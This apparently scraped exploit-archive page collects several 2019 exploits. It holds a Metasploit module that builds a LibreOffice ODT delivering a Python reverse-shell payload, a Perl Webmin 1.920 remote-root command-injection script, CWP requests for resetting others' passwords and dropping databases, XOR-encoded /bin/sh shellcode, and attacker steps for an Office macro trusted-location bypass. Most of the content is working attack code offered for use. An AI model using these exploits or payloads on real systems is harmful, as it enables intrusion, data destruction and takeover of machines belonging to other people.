image
This module exploits a backdoor in Webmin versions 1.890 through 1.920. Only the SourceForge downloads were backdoored, but they are listed as official downloads on the project’s site. Unknown attacker(s) inserted Perl qx statements into the build server’s source code on two separate occasions: once in April 2018, introducing the backdoor in the 1.890 release, and in July 2018, reintroducing the backdoor in releases 1.900 through 1.920. Only version 1.890 is exploitable in the default install. Later affected versions require the expired password changing feature to be enabled.

Source

This Metasploit module generates an ODT file with a dom loaded event that, when triggered, will execute arbitrary python code and the metasploit payload.

MD5 | 6370452257edd14ff2dd490637bb95b3

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::FILEFORMAT

def initialize(info = {})
super(update_info(info,
'Name' => 'LibreOffice Macro Python Code Execution',
'Description' => %q{
LibreOffice comes bundled with sample macros written in Python and
allows the ability to bind program events to them.

LibreLogo is a macro that allows a program event to execute text as Python code, allowing RCE.

This module generates an ODT file with a dom loaded event that,
when triggered, will execute arbitrary python code and the metasploit payload.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Nils Emmerich', # Vulnerability discovery and PoC
'Shelby Pace', # Base module author (CVE-2018-16858), module reviewer and platform-independent code
'LoadLow', # This msf module
'Gabriel Masei' # Global events vuln. disclosure
],
'References' =>
[
[ 'CVE', '2019-9851' ],
[ 'URL', 'https://www.libreoffice.org/about-us/security/advisories/cve-2019-9848/' ],
[ 'URL', 'https://www.libreoffice.org/about-us/security/advisories/cve-2019-9851/' ],
[ 'URL', 'https://insinuator.net/2019/07/libreoffice-a-python-interpreter-code-execution-vulnerability-cve-2019-9848/' ]
],
'DisclosureDate' => '2019-07-16',
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
'DefaultOptions' => { 'Payload' => 'python/meterpreter/reverse_tcp' },
'Targets' => [ ['Automatic', {}] ],
'DefaultTarget' => 0
))

register_options(
[
OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt']),
OptString.new('TEXT_CONTENT', [true, 'Text written in the document. It will be html encoded.', 'My Report']),
])
end

def gen_file
text_content = Rex::Text.html_encode(datastore['TEXT_CONTENT'])
py_code = Rex::Text.encode_base64(payload.encoded)
@cmd = "exec(eval(str(__import__('base64').b64decode('#{py_code}'))))"
@cmd = Rex::Text.html_encode(@cmd)

fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-9848', 'librefile.erb'))
libre_file = ERB.new(fodt_file).result(binding())

print_status("File generated! Now you need to move the odt file and find a way to send it/open it with LibreOffice on the target.")

libre_file
rescue Errno::ENOENT
fail_with(Failure::NotFound, 'Cannot find template file')
end

def exploit
fodt_file = gen_file

file_create(fodt_file)
end
end

Source

Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. It provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy. Individuals can use it to keep remote Websites from tracking them and their family members. They can also use it to connect to resources such as news sites or instant messaging services that are blocked by their local Internet service providers (ISPs).

MD5 | 4a7ee49500d536d6c301a73bac0d0393

Source

Webmin version 1.920 remote root exploit.

MD5 | e3174202504ae321de08a1dd89c21438

#!/usr/bin/perl -w
#
# Webmin 1.920 Remote Root Exploit
#
# Copyright 2019 (c) Todor Donev
#
# Disclaimer:
# This or previous programs are for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# The other exploits not works for me..
#
# Tested on CentOS
#
# [test@localhost ~]$ perl webmin.pl
# [ Webmin 1.920 Remote Root Exploit
# [ ==========================================================
# [ First time released at Defcon
# [ Thank you guys, for all..
# [ Exploit by: Todor Donev
# [
# [ ==========================================================
# [ Usage: webmin.pl
# [ e.g. webmin.pl localhost 10000 "unset HISTFILE;uname -a;id;uptime"
#
# uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
# [test@localhost ~]$
#
#
#
# ATTENTION !! ATTENTION !! ATTENTION !! ATTENTION !! ATTENTION !!
#
# Guys, please give a star to https://github.com/otvorete/petition
# to support the cause of the Bulgarian Hackers (Developers) Community.
# We want to makes our Electronic Government more securе, transparent
# and reliable. For this reason we want from our government to open
# the source codes of the applications. So support us with a star,
# please..
#
# Special thanks to Konstantin Spirov that starting the cause!!
#
#

use strict;
use HTTP::Request;
use LWP::UserAgent;

my $host = shift || 'localhost';
my $port = shift || '10000';
my $cmd = shift || 'uname -a;id;uptime';
$cmd =~ s/|/;/g;

print "[ Webmin 1.920 Remote Root Exploitn";
print "[ ==========================================================n";
print "[ First time released at Defconn";
print "[ Thank you guys, for all..n";
print "[ Exploit by: Todor Donevn";
print "[ n";
print "[ ==========================================================n";
print "[ Usage: $0 n";
print "[ e.g. $0 localhost 10000 "unset HISTFILE;uname -a;id;uptime"n";
my $browser = LWP::UserAgent ->new(ssl_opts => { verify_hostname => 0 });
$browser->timeout(5);
$browser->agent('Mozilla/5.0');
my $target = "https://".$host.":".$port."/password_change.cgi";
my $request = HTTP::Request->new (
POST => $target,
[ Content_Type => "application/x-www-form-urlencoded" ,
Referer => "https://".$host.":".$port."/session_login.cgi" ],
"user=wheel&pam=&expired=2&old=id|echo OWNED;$cmd;echo OWNED&new1=wheel&new2=wheel");
$request->header("Cookie" => "redirect=1; testing=1; sid=x; sessiontest=1;");
my $content = $browser->request($request)->as_string();
print $1 and exit if ($content =~ m/OWNED(.*?)OWNED/ms);
print "[ Exploit Failed!n" and exit if (not $content =~ m/OWNED(.*?)OWNED/ms);

Source

CentOS Control Web Panel (CWP) version 0.9.8.851 allows an attacker to change arbitrary passwords.

MD5 | 7df560dfc3cd46821b6dd0851ddddda5

Exploit Title       : CWP (CentOS Control Web Panel) Reset other phpMyadmin password
Date : 24 Jul 2019
Exploit Author : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
Vendor Homepage : https://control-webpanel.com/
Software Link : Not available, user panel only available for lastest version
Version : 0.9.8.851
Tested on : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)
CVE-Number : CVE-2019-14246
Reference : https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-14246.md


1. Login as attacker (low privilege)
2. Go to "Mysql Manager"
3. Try to change user password of any record
4. Intercept the request

POST /cwp_47e1d536a096e42d/alice/alice/index.php?module=mail_autoreply&acc=changepassuserdb HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 54
Connection: close
Referer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=mysql_manager
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

dates=alice_alice||localhost&passuser=UEBzc3cwcmQxMjM0


5. Modify the request (parameter "dates") and submit

POST /cwp_47e1d536a096e42d/alice/alice/index.php?module=mail_autoreply&acc=changepassuserdb HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 54
Connection: close
Referer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=mysql_manager
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

dates=bob||localhost&passuser=UEBzc3cwcmQxMjM0

Source

CentOS Control Web Panel (CWP) version 0.9.8.851 suffers from an arbitrary database dropping vulnerability.

MD5 | 815a00d6960c4fb8777b34723cfc6bc6

Exploit Title       : CWP (CentOS Control Web Panel) Arbitrary database dropping
Date : 24 Jul 2019
Exploit Author : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
Vendor Homepage : https://control-webpanel.com/
Software Link : Not available, user panel only available for lastest version
Version : 0.9.8.851
Tested on : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)
CVE-Number : CVE-2019-14245
Reference : https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-14245.md

1. Log in as a normal user.
2. Go to "MySQL Manager"
3. Try to delete any database from the account
4. Intercept the request, and modify parameter "database" to target database name such as "oauthv2"

POST /cwp_226727d95b77d953/alice/alice/index.php?module=mysql_manager&acc=deletedatabase HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 20
Connection: close
Referer: https://192.168.80.148:2083/cwp_226727d95b77d953/alice/?module=mysql_manager
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

database=oauthv2

Source

CentOS Control Web Panel (CWP) version 0.9.8.848 suffers from a user enumeration vulnerability.

MD5 | 4d690cefefbcb68edc18c7fc5d83e5ca

Exploit Title       : CWP (CentOS Control Web Panel) User enumerate through HTTP response time
Date : 15 Jul 2019
Exploit Author : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
Vendor Homepage : https://control-webpanel.com/
Software Link : Not available, user panel only available for lastest version
Version : 0.9.8.848
Tested on : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)
CVE-Number : CVE-2019-13599
Reference : https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13599.md


# Description

In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.848, the Login process allows attackers to check whether a username is valid by comparing response times


# PoC

1. Login with valid user and invalid password, the server response time is about 250ms
2. Login with an invalid user and invalid password, the server response time is about 180ms

*The response time are also depend on the network speed. but however, when we log in with valid and invalid username, the response time will be different

Source

WordPress Add Mime Types plugin version 2.2.1 suffers from a cross site request forgery vulnerability.

MD5 | 2bb55a6acfbfa6869d4a50dbb63bbb4b

# Exploit Title: CSRF vulnerabilities in WP Add Mime Types Plugin <= 2.2.1
# Google Dork: inurl:”/wp-content/plugins/wp-add-mime-types”
# Date: 18 july, 2019
# Exploit Author: Princy Edward
# Exploit Author Blog : https://prinyedward.blogspot.com/
# Vendor Homepage: https://wordpress.org/plugins/wp-add-mime-types/
# Software Link: https://downloads.wordpress.org/plugin/wp-add-mime-types.2.2.1.zip
# Version: 2.2.1
# Tested on: Apache/2.2.24 (CentOS)
# CVE : Fresh

#About Plugin
The plugin additionally allows the mime types and file extensions to WordPress. In other words, your WordPress site can upload various file extensions.
#Vulnerable Description
WordPress plugin WP Add Mime Types plugin 2.2.1 vulnerable to CWE-352.
## CSRF Code
Share this malicious link to the plugin user. Once he clicks the link, the mime type will automatically get updated. Here I shared a POC to allow exe files(application/x-msdownload) to be uploaded.








Source

62 bytes small Linux/x86_64 AVX2 XOR decoder + execve(“/bin/sh”) shellcode.

MD5 | e995ac71f71d13c923a5d40f730b27a4

/*
; Title : Linux/x86_64 - AVX2 XOR Decoder + execve("/bin/sh") (62 bytes)
; Date : 2019-08-18
; Author : Gonçalo Ribeiro (@goncalor)
; Website : goncalor.com
; SLAE64-ID : 1635

; this only works on machines with a CPU that supports AVX2 instructions

global _start

_start:
jmp call_decoder

decoder:
pop rsi
lea rdi, [rsi+1]

; shellcode is less than 32 bytes long. can decode with single 256-bit xor.
; for longer shellcodes a loop could be added
vpbroadcastb ymm1, [rsi] ; avx2
vmovdqu ymm0, [rdi] ; avx
vpxor ymm0, ymm1 ; avx2
vmovdqu [rdi], ymm0 ; avx

jmp encoded_shellcode

call_decoder:
call decoder
xor_value: db 0xaa
encoded_shellcode: db 0xe2,0x9b,0x6a,0xfa,0xe2,0x23,0x48,0xe2,0x14,0x85,0xc8,0xc3,0xc4,0x85,0x85,0xd9,0xc2,0xfc,0xe2,0x23,0x4d,0xfa,0xfd,0xe2,0x23,0x4c,0x1a,0x91,0xa5,0xaf
*/


#include
#include

char code[] =
"xebx18x5ex48x8dx7ex01xc4xe2x7dx78x0exc5xfex6fx07xc5xfd"
"xefxc1xc5xfex7fx07xebx06xe8xe3xffxffxffxaaxe2x9bx6axfa"
"xe2x23x48xe2x14x85xc8xc3xc4x85x85xd9xc2xfcxe2x23x4dxfa"
"xfdxe2x23x4cx1ax91xa5xaf";

int main() {
printf("length: %lun", strlen(code));
((int(*)()) code)();
}

Source

Microsoft Office365 and ProPlus build 16.0.11901.20204 suffers from code execution and protection bypass vulnerabilities.

MD5 | 2a3e5e2f19b48891b0c281595f535b3c

# Exploit Title: Microsoft Office Code Execution/Protection Bypass
# Exploit Author: Social Engineering Neo - @EngineeringNeo
# Software Link:
https://products.office.com/en-nz/compare-all-microsoft-office-products
# Version: Office365/ProPlus - (build 16.0.11901.20204)
# Tested on: Windows - (build 18362.295)

Microsoft Office365/ProPlus Auto Macro Code Execution/Protection
Bypass by Social Engineering Neo.
Check out our in-depth report @
https://github.com/SocialEngineeringNeo/Exploits/blob/master/Our%20Exploits/Microsoft/Office/MacroAutoExec_Report.txt

Affected Platforms: -
Microsoft Windows ≤10
Office365 & ProPlus Products ≤2019


Tested On: -
Windows 10 (build 17763.253 & 18362.295)
Office365/ProPlus (build 16.0.11727.20222, 16.0.11901.20170 & 16.0.11901.20204)
Most up to-date version of Microsoft Windows & Office365/ProPlus
Products are affected.


Class: -
Inappropriate Configuration. (CWE-16)
Remote Code Execution.


Summary: -
Multiple Microsoft Office Products Suffer from Inappropriate Default
Configuration, Allowing Auto-Execution of Macro Code Inside
Macro-Enabled Office Documents.


Short Description: -
Macro-enabled Office documents can bypass protections when located in
specific directories/locations on the host machine.


Long Description: -
Standard users can download macro-enabled Access, Excel, PowerPoint,
Word documents and bypass built-in protections allowing potentially
malicious code to run on the affected system without any user consent.
For example, the standard user downloads a macro-enabled Word document
from the internet. The user has the latest Windows & Office365/ProPlus
patches installed.
Let’s assume the document is downloaded & opened in '~Downloads', MS
Word will prevent the script(s) from running and prompt the user for
consent to execute the script. (this is good)
Now, let’s assume that same document is opened in one of the default
"Trusted Locations" '~AppDataRoamingMicrosoftWordSTARTUP', MS
Word will allow the script to run automatically without user consent.
(this is bad)


Proof of Concept: -
Tested on Latest Versions of Access, Excel, InfoPath, OneNote,
Outlook, PowerPoint, Project, Publisher, Visio, Word.

Does (by-default) affect Access, Excel, PowerPoint, Word.
Does not (by-default) affect InfoPath, Visio.
Does not affect OneNote, Outlook, Project, Publisher.

ATTACKER: -
Step 1.) - Inject malicious VBA macro code & payload into Word
document. *preferably AV evasive*
Step 2.) - Send malicious macro-enabled document to victim through internet.
Step 3.) - Setup bind/reverse connection.
*Optional*
Step 1.1) - Create shortcut to intended document location (one of the
default trusted locations). Include link file with original document.
Step 1.2) - Be creative. Think of some path traversal
vulnerabilities;) *who updates zip software anyways*

VICTIM: -
Step 1.) - Download document sent by ATTACKER.
Step 2.) - Open Document in trusted directory/location.
*If Optional Was Done*
Step 1.1) - Unzip/extract document.
Step 1.2) - Open document shortcut.

[CODE EXECUTION SUCCESSFUL]

Am I at risk??? Sure...
Step 1.) - Open Microsoft Office Product.
Step 1.1) - Create a new blank document.

Step 2.) - Navigate to File, Options.
Step 2.1) - Once in the "Word Options" window. Navigate to 'Trust
Center', 'Trust Center Settings'

Step 3.) - Once in the "Trust Center" window. Navigate to 'Trusted Locations'

You will now see locations on the device which can execute macro
commands without additional user interaction. (auto-exec)

VIDEO: - https://youtu.be/jNBl6yiYwmo **updated**
: - https://youtu.be/j75GUD9oUK4 **original**


Expected Result: -
It shouldn't be possible to automatically execute macro code on the
host machine without user consent or additional configuration.
(Clean Install)


Observed Result: -
Office document auto-executes macro code upon loading document without
any user consent, in our case leading to remote code execution.
(User Level Access)


Our Recommendation:
Disable 'Trusted Locations'. This is due to users often not using the
default trusted locations, potentially leaving average users
vulnerable to such attacks when there is no need.

Source